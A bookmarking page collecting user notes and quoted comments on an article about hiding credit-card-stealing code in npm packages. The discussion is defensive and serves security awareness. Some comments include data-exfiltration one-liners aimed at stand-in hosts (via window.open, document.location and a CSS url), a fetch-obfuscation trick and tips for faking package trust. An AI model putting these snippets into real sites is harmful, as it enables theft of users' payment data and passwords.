I’m harvesting credit card numbers and passwords from your site. Here’s how.


301 bookmarks. First posted by sptz45 january 2018.


Recommending an article, "How to steal credit card passwords via npm?", which describes the various ways the author distributed malicious code through npm.

One of the tricks is that package.js and package.min.js contain different code, and the malicious code is placed only in the latter.
from twitter_favs
9 weeks ago by quake0day
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
  * https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
  * https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
  * https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through ``window.open(`https://legit-analytics.com?q=${payload}`, '_blank').close()`` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front-facing Node.js servers had few limitations on which Internet hosts they could communicate with."

* "You could use WebRTC data channels for sending out data. It is not affected by CSP at all... yet.

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do `document.location = 'https://evil-server.com/bounce?q=data'` (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some CSS,
e.g. `something::after { content: url("evilserver.com/userdatastring") }`"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source 
10 weeks ago by dandv
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
adam  package.json  npm 
10 weeks ago by blurback
Describes a speculative attack that CSP should help defend against.

n.b. this article also describes a variation using prefetch that can sneak past CSP.
csp  security  prefetch 
10 weeks ago by wrumsby
Archive 
12 weeks ago by pesche
via Pocket - I’m harvesting credit card numbers and passwords from your site. Here’s how. - Added May 30, 2018 at 10:46PM
IFTTT  Pocket 
june 2018 by BastiRe
may 2018 by gzhihao
😱 Read this blog post:

🙏 Now you know why you need this package in your app…
from twitter_favs
may 2018 by nigeljames
If an attacker successfully injects any code at all, it’s pretty much game over

Also the URL looks a lot like the 300 other requests to ad networks your site makes.

The point is, just because you don’t see it, doesn’t mean it’s not happening. It’s been more than two years and as far as I know, no one has ever noticed one of my requests. Maybe it’s been in your site this whole time :)

I only send these requests intermittently (about one in seven times, lightly randomised — the ideal trouble-shooting-insanity-inducing frequency).
cybersecurity  javascript  obfuscation  password  creditcard  fear  story  browser  plugin  malvertising 
may 2018 by bwiese
NPM as attack vector:
from twitter
march 2018 by brookr
Great article man.

var i = 'gfudi';
// shift every character code down by one: k('gfudi') yields 'fetch'
var k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
Security  hacking  Javascript  Interview 
march 2018 by hackerzhut
march 2018 by nununo
security  javascript  webdev  hacks 
march 2018 by lucapostBo
RT : It's probably only a matter of time if it's not happening already.
from twitter_favs
february 2018 by bf4
Web_Security  Security  Computer_Security 
february 2018 by GameGamer43
maninthemiddle  security  data  harvesting  prevention 
february 2018 by gilberto5757
Lucky for me, we live in an age where people install npm packages like they’re popping pain killers.
security  javascript  node.js 
february 2018 by jbrewer999
This has been making the rounds but you should read it and then weep in a corner with the mess we've made.
from twitter_favs
january 2018 by pixelnated
security  javascript  web 
january 2018 by dstelow
A modern-day "on trusting trust".
javascript  security  npm  web 
january 2018 by dagh
january 2018 by pitiphong_p
Weak web technologies
security  javascript  web  npm  csp  package  hack  via:popular 
january 2018 by rauschen